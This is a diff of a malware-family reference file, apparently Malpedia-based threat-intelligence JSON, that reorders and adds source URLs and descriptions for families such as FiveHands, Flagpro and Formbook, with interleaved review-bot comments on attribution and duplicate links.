 "meta": {
@@ -24700,8 +25844,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.firechili",
- "https://thehackernews.com/2022/04/chinese-hackers-target-vmware-horizon.html",
- "https://www.fortinet.com/blog/threat-research/deep-panda-log4shell-fire-chili-rootkits"
+ "https://www.fortinet.com/blog/threat-research/deep-panda-log4shell-fire-chili-rootkits",
+ "https://thehackernews.com/2022/04/chinese-hackers-target-vmware-horizon.html"
 ],
 "synonyms": [],
 "type": []
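Review bot: The new FINTEAM entry's `description` is vendor prose taken as-is, opening with "Recently, Check Point researchers spotted…", which loses its meaning once it sits undated in a cluster file; other entries in this same patch attribute such text up front (`"According to PCrisk, …"` for Exorcist, `"According to CyberArk, …"` for FickerStealer), so this one should follow the same pattern, e.g. `"description": "According to Check Point, researchers spotted a targeted attack against officials within government finance authorities …"`. The `"type": []` field is left empty although the text describes a DLL-sideloaded backdoor; if the generator supports populating it, doing so here would help consumers filter by malware type. The enclosing array continues outside this hunk.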
@@ -24753,9 +25897,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fishmaster", + "https://decoded.avast.io/luigicamastra/backdoored-client-from-mongolian-ca-monpass/", "https://media-exp1.licdn.com/dms/document/C561FAQHhWFRcWmdCPw/feedshare-document-pdf-analyzed/0/1639591145314?e=1658966400&v=beta&t=_uCcyEVg6b_VDiBTvWQIXtBOdQ1GQAAydqGyq62KA3E", - "https://speakerdeck.com/aragorntseng/winnti-is-coming-evolution-after-prosecution-at-hitcon2021", - "https://decoded.avast.io/luigicamastra/backdoored-client-from-mongolian-ca-monpass/" + "https://speakerdeck.com/aragorntseng/winnti-is-coming-evolution-after-prosecution-at-hitcon2021" ], "synonyms": [ "JollyJellyfish" 
@@ -24770,18 +25914,18 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fivehands", - "https://research.nccgroup.com/2021/06/15/handy-guide-to-a-new-fivehands-ransomware-variant/", - "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126b", - "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/yanluowang-ransomware-attacks-continue", "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/yanluowang-ransomware-attacks-continue", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a", + "https://www.bleepingcomputer.com/news/security/yanluowang-ransomware-operation-matures-with-experienced-affiliates/", "https://www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-sophisticated-financial-threat.html", "https://www.fireeye.com/blog/threat-research/2021/06/darkside-affiliate-supply-chain-software-compromise.html", - "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself", + "https://research.nccgroup.com/2021/06/15/handy-guide-to-a-new-fivehands-ransomware-variant/", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126b", "https://www.cisa.gov/uscert/ncas/alerts/aa22-249a", + "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself", "https://www.crowdstrike.com/blog/new-ransomware-variant-uses-golang-packer/", - "https://www.esentire.com/blog/conti-affiliate-exposed-new-domain-names-ip-addresses-and-email-addresses-uncovered-by-esentire", - "https://www.bleepingcomputer.com/news/security/yanluowang-ransomware-operation-matures-with-experienced-affiliates/" + 
"https://www.esentire.com/blog/conti-affiliate-exposed-new-domain-names-ip-addresses-and-email-addresses-uncovered-by-esentire" ], "synonyms": [ "Thieflock" @@ -24792,16 +25936,16 @@ "value": "FiveHands" }, { - "description": "", + "description": "According to PICUS, Flagpro is malware that collects information from the victim and executes commands in the victim\u2019s environment. It targets Japan, Taiwan, and English-speaking countries. When a victim is infected with Flagpro malware, the malware can do the following:\r\n\r\nDownload and execute a tool\r\nExecute OS commands and send results\r\nCollect and send Windows authentication information", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.flagpro", - "https://cyberandramen.net/2021/12/12/more-flagpro-more-problems/", - "https://insight-jp.nttsecurity.com/post/102h7vx/blacktechflagpro", "https://insight-jp.nttsecurity.com/post/102hf3q/flagpro-the-new-malware-used-by-blacktech", + "https://cyberandramen.net/2021/12/12/more-flagpro-more-problems/", + "https://jp.security.ntt/resources/EN-BlackTech_2021.pdf", + "https://insight-jp.nttsecurity.com/post/102h7vx/blacktechflagpro", "https://vblocalhost.com/uploads/VB2021-50.pdf", - "https://jsac.jpcert.or.jp/archive/2022/pdf/JSAC2022_8_hara_en.pdf", - "https://jp.security.ntt/resources/EN-BlackTech_2021.pdf" + "https://jsac.jpcert.or.jp/archive/2022/pdf/JSAC2022_8_hara_en.pdf" ], "synonyms": [ "BUSYICE" 
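Review bot: The new Flagpro `description` is attributed to PICUS ("According to PICUS, Flagpro is malware that..."), but no Picus source is added to `refs` in the same hunk; the list holds only the Malpedia, NTT, cyberandramen, vblocalhost and JPCERT links. Either add the Picus article the text was taken from, `"<PICUS_FLAGPRO_URL>"`, to `refs` so the attribution is traceable, or drop the "According to PICUS," prefix and let the text stand on the references that are listed. The embedded `\r\n` line breaks match the convention used by other entries in this file, so I would leave those as they are.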
@@ -24817,13 +25961,13 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.flame", "https://securelist.com/the-flame-questions-and-answers-51/34344/", - "https://storage.googleapis.com/chronicle-research/Flame%202.0%20Risen%20from%20the%20Ashes.pdf", - "https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf", "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=ce2df4da-afe9-4a24-b28c-0fb3ba671d95&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments", "https://github.com/juanandresgs/papers/raw/master/Flame%202.0%20Risen%20from%20the%20Ashes.pdf", - "https://www.symantec.com/connect/blogs/flamer-recipe-bluetoothache", "https://www.welivesecurity.com/wp-content/uploads/2021/12/eset_jumping_the_air_gap_wp.pdf", - "https://www.crysys.hu/publications/files/skywiper.pdf" + "https://www.crysys.hu/publications/files/skywiper.pdf", + "https://storage.googleapis.com/chronicle-research/Flame%202.0%20Risen%20from%20the%20Ashes.pdf", + "https://www.symantec.com/connect/blogs/flamer-recipe-bluetoothache", + "https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf" ], "synonyms": [ "sKyWIper" @@ -24838,8 +25982,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.flashflood", - "https://www.mandiant.com/sites/default/files/2021-09/rpt-apt30.pdf", - "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" + "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf", + "https://www.mandiant.com/sites/default/files/2021-09/rpt-apt30.pdf" ], "synonyms": [], "type": [] 
@@ -24852,28 +25996,28 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.flawedammyy", - "https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf", - "https://threatrecon.nshc.net/2019/08/29/sectorj04-groups-increased-activity-in-2019/", - "https://habr.com/ru/company/pt/blog/475328/", + "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/", + "https://intel471.com/blog/a-brief-history-of-ta505", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf", - "https://web.archive.org/web/20161223002016/https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks", + "https://www.youtube.com/watch?v=N4f2e8Mygag", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", "https://www.proofpoint.com/us/threat-insight/post/ta505-abusing-settingcontent-ms-within-pdf-files-distribute-flawedammyy-rat", "https://www.proofpoint.com/us/threat-insight/post/leaked-source-code-ammyy-admin-turned-flawedammyy-rat", - "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/operation-ta505/", - "https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do", - "https://www.npu.gov.ua/news/kiberzlochini/kiberpolicziya-vikrila-xakerske-ugrupovannya-u-rozpovsyudzhenni-virusu-shifruvalnika-ta-nanesenni-inozemnim-kompaniyam-piv-milyarda-dolariv-zbitkiv/", - "https://www.proofpoint.com/us/threat-insight/post/ta505-begins-summer-campaigns-new-pet-malware-downloader-andromut-uae-south", - "https://blog.trendmicro.com/trendlabs-security-intelligence/ta505-at-it-again-variety-is-the-spice-of-servhelper-and-flawedammyy/", - "https://secrary.com/ReversingMalware/AMMY_RAT_Downloader/", - "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", - "https://attack.mitre.org/software/S0381/", - 
"https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/", "https://www.sans.org/reading-room/whitepapers/reverseengineeringmalware/unpacking-decrypting-flawedammyy-38930", + "https://threatrecon.nshc.net/2019/08/29/sectorj04-groups-increased-activity-in-2019/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/ta505-at-it-again-variety-is-the-spice-of-servhelper-and-flawedammyy/", "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", - "https://www.youtube.com/watch?v=N4f2e8Mygag", + "https://www.proofpoint.com/us/threat-insight/post/ta505-begins-summer-campaigns-new-pet-malware-downloader-andromut-uae-south", "https://www.secureworks.com/research/threat-profiles/gold-tahoe", - "https://intel471.com/blog/a-brief-history-of-ta505" + "https://attack.mitre.org/software/S0381/", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/operation-ta505/", + "https://secrary.com/ReversingMalware/AMMY_RAT_Downloader/", + "https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf", + "https://habr.com/ru/company/pt/blog/475328/", + "https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do", + "https://web.archive.org/web/20161223002016/https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks", + "https://www.npu.gov.ua/news/kiberzlochini/kiberpolicziya-vikrila-xakerske-ugrupovannya-u-rozpovsyudzhenni-virusu-shifruvalnika-ta-nanesenni-inozemnim-kompaniyam-piv-milyarda-dolariv-zbitkiv/" ], "synonyms": [], "type": [] 
@@ -24886,22 +26030,25 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.flawedgrace", - "https://www.proofpoint.com/us/blog/threat-insight/whatta-ta-ta505-ramps-activity-delivers-new-flawedgrace-variant", - "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", - "https://www.msreverseengineering.com/blog/2021/3/2/an-exhaustively-analyzed-idb-for-flawedgrace", - "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", - "https://www.secureworks.com/research/threat-profiles/gold-tahoe", - "https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/", "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/", "https://intel471.com/blog/a-brief-history-of-ta505", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf", - "https://www.crowdstrike.com/blog/how-falcon-complete-stopped-a-solarwinds-serv-u-exploit-campaign/", + "https://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/", + "https://www.proofpoint.com/us/blog/threat-insight/whatta-ta-ta505-ramps-activity-delivers-new-flawedgrace-variant", + "https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/", "https://www.msreverseengineering.com/blog/2019/1/14/a-quick-solution-to-an-ugly-reverse-engineering-problem", + "https://blog.codsec.com/posts/malware/gracewire_adventure/", "https://research.nccgroup.com/2021/12/01/tracking-a-p2p-network-related-with-ta505/", - "https://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505", + "https://www.crowdstrike.com/blog/how-falcon-complete-stopped-a-solarwinds-serv-u-exploit-campaign/", + "https://www.msreverseengineering.com/blog/2021/3/2/an-exhaustively-analyzed-idb-for-flawedgrace", + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672", - 
"https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf", - "https://twitter.com/MsftSecIntel/status/1273359829390655488" + "https://www.secureworks.com/research/threat-profiles/gold-tahoe", + "https://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505", + "https://web.archive.org/web/20221115161556/https://blog.codsec.com/posts/malware/gracewire_adventure/", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://twitter.com/MsftSecIntel/status/1273359829390655488", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf" ], "synonyms": [ "GraceWire" @@ -24929,12 +26076,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.floki_bot", - "https://blog.malwarebytes.com/threat-analysis/2016/11/floki-bot-and-the-stealthy-dropper/", - "https://www.flashpoint-intel.com/flokibot-curious-case-brazilian-connector/", - "https://www.flashpoint-intel.com/blog/cybercrime/floki-bot-emerges-new-malware-kit/", - "https://www.cylance.com/en_us/blog/threat-spotlight-flokibot-pos-malware.html", "http://adelmas.com/blog/flokibot.php", + "https://www.cylance.com/en_us/blog/threat-spotlight-flokibot-pos-malware.html", + "https://www.flashpoint-intel.com/flokibot-curious-case-brazilian-connector/", "https://www.arbornetworks.com/blog/asert/flokibot-flock-bots/", + "https://www.flashpoint-intel.com/blog/cybercrime/floki-bot-emerges-new-malware-kit/", + "https://blog.malwarebytes.com/threat-analysis/2016/11/floki-bot-and-the-stealthy-dropper/", "http://blog.talosintel.com/2016/12/flokibot-collab.html#more" ], "synonyms": [], 
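Review bot: The FlawedGrace `refs` gain both `https://blog.codsec.com/posts/malware/gracewire_adventure/` and the Wayback snapshot `https://web.archive.org/web/20221115161556/https://blog.codsec.com/posts/malware/gracewire_adventure/` of the same article, so one source is now listed twice. Keep the live URL only, or the archive URL only if the original is known to be unavailable; if both are intentional, at least place them adjacent so the duplication is visible to the next reader. The same pattern already exists as context lines in this list, and in the FlawedAmmyy hunk above, with `https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/` and `https://intel471.com/blog/a-brief-history-of-ta505`; that is pre-existing but worth collapsing in the same pass.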
@@ -24948,11 +26095,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.flowcloud", - "https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape", - "https://www.dragos.com/blog/industry-news/new-ics-threat-activity-group-talonite/", "https://www.welivesecurity.com/2022/04/27/lookback-ta410-umbrella-cyberespionage-ttps-activity/", + "https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape", "https://nao-sec.org/2021/01/royal-road-redive.html", "https://www.proofpoint.com/us/blog/threat-insight/ta410-group-behind-lookback-attacks-against-us-utilities-sector-returns-new", + "https://www.dragos.com/blog/industry-news/new-ics-threat-activity-group-talonite/", "https://www.proofpoint.com/us/blog/threat-insight/flowcloud-version-413-malware-analysis" ], "synonyms": [], @@ -24966,8 +26113,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.flowershop", - "https://storage.googleapis.com/chronicle-research/STUXSHOP%20Stuxnet%20Dials%20In%20.pdf", - "https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf" + "https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf", + "https://storage.googleapis.com/chronicle-research/STUXSHOP%20Stuxnet%20Dials%20In%20.pdf" ], "synonyms": [], "type": [] @@ -24980,8 +26127,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.floxif", - "https://www.mandiant.com/resources/pe-file-infecting-malware-ot", - "https://www.virusbulletin.com/virusbulletin/2012/12/compromised-library" + "https://www.virusbulletin.com/virusbulletin/2012/12/compromised-library", + "https://www.mandiant.com/resources/pe-file-infecting-malware-ot" ], "synonyms": [], "type": [] 
@@ -25033,11 +26180,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fobber", - "http://byte-atlas.blogspot.ch/2015/08/knowledge-fragment-unwrapping-fobber.html", - "http://www.govcert.admin.ch/downloads/whitepapers/govcertch_fobber_analysis.pdf", "http://blog.wizche.ch/fobber/malware/analysis/2015/08/10/fobber-encryption.html", "https://www.govcert.admin.ch/blog/12/analysing-a-new-ebanking-trojan-called-fobber", - "https://blog.malwarebytes.com/threat-analysis/2015/06/elusive-hanjuan-ek-caught-in-new-malvertising-campaign/" + "http://byte-atlas.blogspot.ch/2015/08/knowledge-fragment-unwrapping-fobber.html", + "https://blog.malwarebytes.com/threat-analysis/2015/06/elusive-hanjuan-ek-caught-in-new-malvertising-campaign/", + "http://www.govcert.admin.ch/downloads/whitepapers/govcertch_fobber_analysis.pdf" ], "synonyms": [], "type": [] @@ -25050,8 +26197,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fonix", - "https://labs.bitdefender.com/2021/02/fonix-ransomware-decryptor/", - "https://labs.sentinelone.com/the-fonix-raas-new-low-key-threat-with-unnecessary-complexities/" + "https://labs.sentinelone.com/the-fonix-raas-new-low-key-threat-with-unnecessary-complexities/", + "https://labs.bitdefender.com/2021/02/fonix-ransomware-decryptor/" ], "synonyms": [], "type": [] 
@@ -25064,67 +26211,72 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook", - "https://www.zscaler.com/blogs/security-research/analysis-xloaders-c2-network-encryption", - "https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/", - "https://usualsuspect.re/article/formbook-hiding-in-plain-sight", - "https://securityintelligence.com/posts/roboski-global-recovery-automation/", - "https://www.connectwise.com/resources/formbook-remcos-rat", - "https://www.peerlyst.com/posts/how-to-understand-formbook-a-new-malware-as-a-service-sudhendu?", - "https://www.hornetsecurity.com/en/threat-research/vba-purging-malspam-campaigns/", - "https://www.peerlyst.com/posts/how-to-analyse-formbook-a-new-malware-as-a-service-sudhendu?trk=explore_page_resources_recent", - "https://www.fortinet.com/blog/threat-research/deep-analysis-formbook-new-variant-delivered-phishing-campaign-part-ii", - "https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf", - "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ipfs-a-new-data-frontier-or-a-new-cybercriminal-hideout", - "https://www.trendmicro.com/en_us/research/21/i/formbook-adds-latest-office-365-0-day-vulnerability-cve-2021-404.html", - "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", - "https://www.virusbulletin.com/virusbulletin/2019/01/vb2018-paper-inside-formbook-infostealer/", - "https://research.loginsoft.com/threat-research/from-innocence-to-malice-the-onenote-malware-campaign-uncovered/", - "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/trojanized-onenote-document-leads-to-formbook-malware/", - "https://www.arbornetworks.com/blog/asert/formidable-formbook-form-grabber/", - 
"https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/", - "https://threatresearch.ext.hp.com/javascript-malware-dispensing-rats-into-the-wild/", - "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware", - "https://drive.google.com/file/d/1oxINyIJfMtv_upJqRK9vLSchIBaU8wiU/view", + "https://www.fortinet.com/blog/threat-research/excel-document-delivers-multiple-malware-exploiting-cve-2017-11882-part-two", "https://youtu.be/aQwnHIlGSBM", - "https://link.medium.com/uaBiIXgUU8", - "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/", - "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko", - "https://www.fortinet.com/blog/threat-research/deep-analysis-new-formbook-variant-delivered-phishing-campaign-part-I", - "https://www.cyberbit.com/blog/endpoint-security/formbook-research-hints-large-data-theft-attack-brewing/", - "https://www.fortinet.com/blog/threat-research/excel-document-delivers-malware-by-exploiting-cve-2017-11882", - "https://blog.cyble.com/2022/07/01/xloader-returns-with-new-infection-technique/", - "https://blog.talosintelligence.com/2018/06/my-little-formbook.html", - "https://insights.oem.avira.com/a-new-technique-to-analyze-formbook-malware-infections/", - "https://thisissecurity.stormshield.com/2018/03/29/in-depth-formbook-malware-analysis-obfuscation-and-process-injection/", - "https://www.botconf.eu/wp-content/uploads/2018/12/2018-R-Jullian-In-depth-Formbook-Malware-Analysis.pdf", - "https://www.lac.co.jp/lacwatch/report/20220307_002893.html", - "https://www.fireeye.com/blog/threat-research/2017/10/formbook-malware-distribution-campaigns.html", - "https://www.malwarebytes.com/blog/threat-intelligence/2022/20221121-threat-intel-report-final.pdf", - 
"https://www.trellix.com/en-us/about/newsroom/stories/research/cyberattacks-targeting-ukraine-increase.html", "https://blog.malwarebytes.com/threat-analysis/2021/05/revisiting-the-nsis-based-crypter/", - "https://blogs.blackberry.com/en/2021/09/threat-thursday-xloader-infostealer", - "https://blog.360totalsecurity.com/en/bayworld-event-cyber-attack-against-foreign-trade-industry/", - "https://tccontre.blogspot.com/2020/11/interesting-formbook-crypter.html", - "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord", - "https://forensicitguy.github.io/xloader-formbook-velvetsweatshop-spreadsheet/", + "https://www.arbornetworks.com/blog/asert/formidable-formbook-form-grabber/", + "https://www.netskope.com/blog/new-formbook-campaign-delivered-through-phishing-emails", + "https://www.fortinet.com/blog/threat-research/excel-document-delivers-malware-by-exploiting-cve-2017-11882", "https://blog.talosintelligence.com/2019/07/sweed-agent-tesla.html", + "https://blogs.quickheal.com/formbook-malware-returns-new-variant-uses-steganography-and-in-memory-loading-of-multiple-stages-to-steal-data/", + "https://blog.talosintelligence.com/2018/06/my-little-formbook.html", + "https://www.fortinet.com/blog/threat-research/deep-analysis-new-formbook-variant-delivered-phishing-campaign-part-I", + "https://www.malware-traffic-analysis.net/2023/06/05/index.html", + "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko", + "https://www.fireeye.com/blog/threat-research/2017/10/formbook-malware-distribution-campaigns.html", + "https://elastic.github.io/security-research/intelligence/2022/01/01.formbook-adopts-cabless-approach/article/", + "https://blog.cyble.com/2022/07/01/xloader-returns-with-new-infection-technique/", + "https://insights.oem.avira.com/a-new-technique-to-analyze-formbook-malware-infections/", + 
"https://www.peerlyst.com/posts/how-to-understand-formbook-a-new-malware-as-a-service-sudhendu?", + "https://link.medium.com/uaBiIXgUU8", + "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord", + "https://www.botconf.eu/wp-content/uploads/2018/12/2018-R-Jullian-In-depth-Formbook-Malware-Analysis.pdf", + "https://www.fortinet.com/blog/threat-research/deep-analysis-formbook-new-variant-delivered-phishing-campaign-part-ii", + "http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html", + "https://www.zscaler.com/blogs/security-research/technical-analysis-xloaders-code-obfuscation-version-43", + "https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/", + "https://usualsuspect.re/article/formbook-hiding-in-plain-sight", + "https://cert.gov.ua/article/955924", + "https://www.cyren.com/blog/articles/example-analysis-of-multi-component-malware", + "https://tccontre.blogspot.com/2020/11/interesting-formbook-crypter.html", + "https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf", + "https://www.zscaler.com/blogs/security-research/analysis-xloaders-c2-network-encryption", + "https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors", + "https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/", + "https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/", + "https://thisissecurity.stormshield.com/2018/03/29/in-depth-formbook-malware-analysis-obfuscation-and-process-injection/", + "https://www.peerlyst.com/posts/how-to-analyse-formbook-a-new-malware-as-a-service-sudhendu?trk=explore_page_resources_recent", + "https://securityintelligence.com/posts/roboski-global-recovery-automation/", + 
"https://www.trellix.com/en-us/about/newsroom/stories/research/cyberattacks-targeting-ukraine-increase.html", + "https://blog.netlab.360.com/purecrypter", + "https://forensicitguy.github.io/xloader-formbook-velvetsweatshop-spreadsheet/", + "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware", + "http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/", "https://isc.sans.edu/diary/26806", "https://www.cyberbit.com/formbook-research-hints-large-data-theft-attack-brewing/", - "https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors", - "https://asec.ahnlab.com/en/32149/", - "https://www.fortinet.com/blog/threat-research/excel-document-delivers-multiple-malware-exploiting-cve-2017-11882-part-two", - "https://news.sophos.com/en-us/2020/05/14/raticate/", - "http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html", - "https://www.cyren.com/blog/articles/example-analysis-of-multi-component-malware", - "https://yoroi.company/research/office-documents-may-the-xll-technique-change-the-threat-landscape-in-2022/", - "http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/", - "https://cert.gov.ua/article/955924", - "https://www.netskope.com/blog/new-formbook-campaign-delivered-through-phishing-emails", - "https://blog.netlab.360.com/purecrypter", - "https://blogs.quickheal.com/formbook-malware-returns-new-variant-uses-steganography-and-in-memory-loading-of-multiple-stages-to-steal-data/", - "http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html", + "https://research.loginsoft.com/threat-research/from-innocence-to-malice-the-onenote-malware-campaign-uncovered/", + "https://drive.google.com/file/d/1oxINyIJfMtv_upJqRK9vLSchIBaU8wiU/view", + "https://kienmanowar.wordpress.com/2023/07/06/quicknote-examining-formbook-campaign-via-phishing-emails/", + 
"https://www.virusbulletin.com/virusbulletin/2019/01/vb2018-paper-inside-formbook-infostealer/", + "https://www.trendmicro.com/en_us/research/21/i/formbook-adds-latest-office-365-0-day-vulnerability-cve-2021-404.html", + "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ipfs-a-new-data-frontier-or-a-new-cybercriminal-hideout", + "https://blog.360totalsecurity.com/en/bayworld-event-cyber-attack-against-foreign-trade-industry/", + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/", - "https://elastic.github.io/security-research/intelligence/2022/01/01.formbook-adopts-cabless-approach/article/" + "https://www.connectwise.com/resources/formbook-remcos-rat", + "https://threatresearch.ext.hp.com/javascript-malware-dispensing-rats-into-the-wild/", + "https://www.hornetsecurity.com/en/threat-research/vba-purging-malspam-campaigns/", + "https://github.com/itaymigdal/malware-analysis-writeups/blob/main/FormBook/FormBook.md", + "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/", + "https://blogs.blackberry.com/en/2021/09/threat-thursday-xloader-infostealer", + "https://www.malwarebytes.com/blog/threat-intelligence/2022/20221121-threat-intel-report-final.pdf", + "https://www.lac.co.jp/lacwatch/report/20220307_002893.html", + "http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html", + "https://www.cyberbit.com/blog/endpoint-security/formbook-research-hints-large-data-theft-attack-brewing/", + "https://news.sophos.com/en-us/2020/05/14/raticate/", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/trojanized-onenote-document-leads-to-formbook-malware/", + "https://asec.ahnlab.com/en/32149/", + "https://yoroi.company/research/office-documents-may-the-xll-technique-change-the-threat-landscape-in-2022/" ], "synonyms": [ "win.xloader" 
@@ -25139,11 +26291,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.former_first_rat", - "https://researchcenter.paloaltonetworks.com/2015/04/unit-42-identifies-new-dragonok-backdoor-malware-deployed-against-japanese-targets/", - "https://decoded.avast.io/luigicamastra/operation-dragon-castling-apt-group-targeting-betting-companies", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/space-pirates-tools-and-connections/", "https://threatvector.cylance.com/en_us/home/breaking-down-ff-rat-malware.html", "https://unit42.paloaltonetworks.com/atoms/shallowtaurus/", - "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/space-pirates-tools-and-connections/" + "https://decoded.avast.io/luigicamastra/operation-dragon-castling-apt-group-targeting-betting-companies", + "https://researchcenter.paloaltonetworks.com/2015/04/unit-42-identifies-new-dragonok-backdoor-malware-deployed-against-japanese-targets/" ], "synonyms": [ "ffrat" @@ -25198,11 +26350,13 